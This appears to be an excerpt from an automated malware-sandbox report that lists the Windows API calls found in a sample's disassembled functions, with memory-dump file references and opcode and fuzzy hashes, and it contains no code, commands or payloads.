                                                                                                                                                                              • Instruction Fuzzy Hash: 34319571904348AFEB32CF249C55BE6BBEC9F02308F0444AEE6DA57242D7745A85CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00DD894C,?,00E69CE8,0000000C), ref: 00DD8A84
                                                                                                                                                                              • GetLastError.KERNEL32(?,00DD894C,?,00E69CE8,0000000C), ref: 00DD8A8E
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DD8AB9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2583163307-0
                                                                                                                                                                              • Opcode ID: 0eaf0b37284d6da230fa237be271964a68934379cfdedc0d301333f640468013
                                                                                                                                                                              • Instruction ID: 474027a773552171b9b432c22a1aa62d7c6e650967229a392f158ca6eec86e51
                                                                                                                                                                              • Opcode Fuzzy Hash: 0eaf0b37284d6da230fa237be271964a68934379cfdedc0d301333f640468013
                                                                                                                                                                              • Instruction Fuzzy Hash: 74012B326055606AD7266238BC46B7E67498B81734F3E115BF9289B3D2DF30CD8461B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00DD97BA,FF8BC369,00000000,00000002,00000000), ref: 00DD9744
                                                                                                                                                                              • GetLastError.KERNEL32(?,00DD97BA,FF8BC369,00000000,00000002,00000000,?,00DD5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00DC6F41), ref: 00DD974E
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DD9755
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                              • Opcode ID: 34c4a7f4657cd4ff96a5d32cf189fa9fd2cf5f84a78931ab0b1b32535582d671
                                                                                                                                                                              • Instruction ID: 36ab188dfb2be45276a35ca313297231174c34513cb1c26bb600aa68f622a17f
                                                                                                                                                                              • Opcode Fuzzy Hash: 34c4a7f4657cd4ff96a5d32cf189fa9fd2cf5f84a78931ab0b1b32535582d671
                                                                                                                                                                              • Instruction Fuzzy Hash: 05014032620115BFCB059F99EC05DAE7B1ADB85330B38024AF86197390EA71DD4187B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DA3A3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                              • Opcode ID: 82a51fc1186b133d165add016302a39125bafc23ea654602a04273e73cfd6ef7
                                                                                                                                                                              • Instruction ID: d5309208d8f84607bc2efca103f3acbd9b1519d41fb39981a99bcf3aaf089309
                                                                                                                                                                              • Opcode Fuzzy Hash: 82a51fc1186b133d165add016302a39125bafc23ea654602a04273e73cfd6ef7
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C31A570504701DFD320DF25D884797BBE8FB49308F04092EF6D997281E775A988CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 00DA333D
                                                                                                                                                                                • Part of subcall function 00DA32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DA32FB
                                                                                                                                                                                • Part of subcall function 00DA32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DA3312
                                                                                                                                                                                • Part of subcall function 00DA338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DA3368,?), ref: 00DA33BB
                                                                                                                                                                                • Part of subcall function 00DA338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
                                                                                                                                                                                • Part of subcall function 00DA338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E72418,00E72400,?,?,?,?,?,?,00DA3368,?), ref: 00DA343A
                                                                                                                                                                                • Part of subcall function 00DA338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DA34BB
                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00DA3377
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1550534281-0
                                                                                                                                                                              • Opcode ID: 941f814d2cf772b85b27aaab46cbd44d60bbc6ee7090834b78263f3e3679a40a
                                                                                                                                                                              • Instruction ID: abfac2b3ea5655282914ba0ecdbcc90b43ec8bdc9fe1cc71ee250f400ce8d275
                                                                                                                                                                              • Opcode Fuzzy Hash: 941f814d2cf772b85b27aaab46cbd44d60bbc6ee7090834b78263f3e3679a40a
                                                                                                                                                                              • Instruction Fuzzy Hash: F5F05E31558346BFD700EFB2FC0AB243BA5E701719F04481DB60DAA0E2DBBA91D89B74
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandleSleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 252777609-0
                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                              • Instruction ID: 76249fcee10ecf54158c32ce7e3b59517bc64cb4a9f9c5f94ab6152a0d703ebe
                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                              • Instruction Fuzzy Hash: 4631D570A00106DFC718CF58D480F69FBA5FB49301B2986A9E449CB256D732EDC1EBE0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00DACEEE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1385522511-0
                                                                                                                                                                              • Opcode ID: 127d7ea5184e7f1de81cd1d0dc077f36dc7aa4e2cddf1ff3ebebd01eae13062b
                                                                                                                                                                              • Instruction ID: 8836cf61095ecd8871f5c93cb86f9a3e6cb1f85232215f606069fcc3966bbc5f
                                                                                                                                                                              • Opcode Fuzzy Hash: 127d7ea5184e7f1de81cd1d0dc077f36dc7aa4e2cddf1ff3ebebd01eae13062b
                                                                                                                                                                              • Instruction Fuzzy Hash: 3932C278A00209EFCF20DF54C884ABAB7B5EF46364F198059E95AAB351C734ED45CB71
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                              • Opcode ID: 98c9c6a78931c579266303b16c7ee5232b816d3f96acdbab95ea1ebad04b8980
                                                                                                                                                                              • Instruction ID: 1291bd6cd156cc0646067bef5f1a26366d299235ac6e3573f57791435c23f792
                                                                                                                                                                              • Opcode Fuzzy Hash: 98c9c6a78931c579266303b16c7ee5232b816d3f96acdbab95ea1ebad04b8980
                                                                                                                                                                              • Instruction Fuzzy Hash: 4DD18C74A04219DFCF14EF98D8819EDBBB5FF48324F14515AE915BB291DB30AE81CBA0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b1f0909a9a56f536396a613ada7b1e3ada8862701391ebe23c946bed142d09e7
                                                                                                                                                                              • Instruction ID: d18655df934fdc32868d7d38da266a80e553f3a1c32d2107174bd401c0cfcc01
                                                                                                                                                                              • Opcode Fuzzy Hash: b1f0909a9a56f536396a613ada7b1e3ada8862701391ebe23c946bed142d09e7
                                                                                                                                                                              • Instruction Fuzzy Hash: 8E51C335A00209AFDB10DF68C841FE9BBA2EB85364F19816CE8489B391D731ED42CB70
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00E0FCCE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharLower
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2358735015-0
                                                                                                                                                                              • Opcode ID: 5863ea31516a7ae3ba68329174da9d28bb49bd513c62463967ad9f32644762b7
                                                                                                                                                                              • Instruction ID: 9a18064cdf01367eae271813166731375ca9655227931ba91135329fd2502a0c
                                                                                                                                                                              • Opcode Fuzzy Hash: 5863ea31516a7ae3ba68329174da9d28bb49bd513c62463967ad9f32644762b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 5541B672900209EFDB21DF68C881AAEB7B8EF44314B14453EE516E7691EB70DE55CB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA664A
                                                                                                                                                                                • Part of subcall function 00DA663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DA665C
                                                                                                                                                                                • Part of subcall function 00DA663E: FreeLibrary.KERNEL32(00000000,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA666E
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA66AB
                                                                                                                                                                                • Part of subcall function 00DA6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6610
                                                                                                                                                                                • Part of subcall function 00DA6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DA6622
                                                                                                                                                                                • Part of subcall function 00DA6607: FreeLibrary.KERNEL32(00000000,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6635
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2632591731-0
                                                                                                                                                                              • Opcode ID: ac108e9f64946e2edb9296d6cfadd77953d7b865412eac4fda6fd6b73cf2d7f7
                                                                                                                                                                              • Instruction ID: 4d3c174c7b2f0db70919cd3c804ee1e33bd14585c0c8c3d38ac4f789eb4348c2
                                                                                                                                                                              • Opcode Fuzzy Hash: ac108e9f64946e2edb9296d6cfadd77953d7b865412eac4fda6fd6b73cf2d7f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 2811C172600205EACB15BB30DC06BAD7BA5EF52715F28886DF482A61C2EE75DA05DB70
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                              • Opcode ID: 6bfbb037d5d4b3e42a0b1f4ec1981479f4d04787d7156212ed7fc2bc2afd0dc1
                                                                                                                                                                              • Instruction ID: 55b531c959f9811ccae09b4e36e1789b6853d68c4e975f6046ebacf6da7c6548
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bfbb037d5d4b3e42a0b1f4ec1981479f4d04787d7156212ed7fc2bc2afd0dc1
                                                                                                                                                                              • Instruction Fuzzy Hash: 34115A7190420AAFCF16DF58E94099E7BF4EF48300F1040AAF808AB311DA31EE21DB74
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DD4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DD319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DD5031
                                                                                                                                                                              • _free.LIBCMT ref: 00DD53DF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                              • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                              • Instruction ID: 072b213c882faa7652667de903610ae92264ee5b84c4a4b74e7b8ed7b5d2813d
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                              • Instruction Fuzzy Hash: 1901F9B2200705ABE3318F69E88195AFBEDEF85370F65051EE59483380EB70A905C774
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                              • Instruction ID: 117e032fff8d1bc3a8dd38d8ad9aafd42a227cf7f56fde6381ba281b64949045
                                                                                                                                                                              • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                              • Instruction Fuzzy Hash: C3F0F47250062156DA323B6ADC01FAA3799CF82330F14072FF465932D1EF74E9028AF2
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                              • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                              • Instruction ID: 58d54f1e98942697642e568129e214de3293765bb5bc95f3c6addbb4893f64ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0C8B3601705AED7149F69D806F66BF98EB44360F14812EFA19CB1D1DB31E5108BB0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E1F987
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1431749950-0
                                                                                                                                                                              • Opcode ID: a6b57fcec0a29022eaa53e090f51e2b172550d127d9689b58600c365c78894a5
                                                                                                                                                                              • Instruction ID: 219dbaae776fac7bf95487badd5b6313b02b01304e177383df8789821ddb17de
                                                                                                                                                                              • Opcode Fuzzy Hash: a6b57fcec0a29022eaa53e090f51e2b172550d127d9689b58600c365c78894a5
                                                                                                                                                                              • Instruction Fuzzy Hash: E5F03176600205BFCB01EBA5DC46E9FBBB8EF95710F044059F505EB261DA70AA41CB71
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DD319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DD5031
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
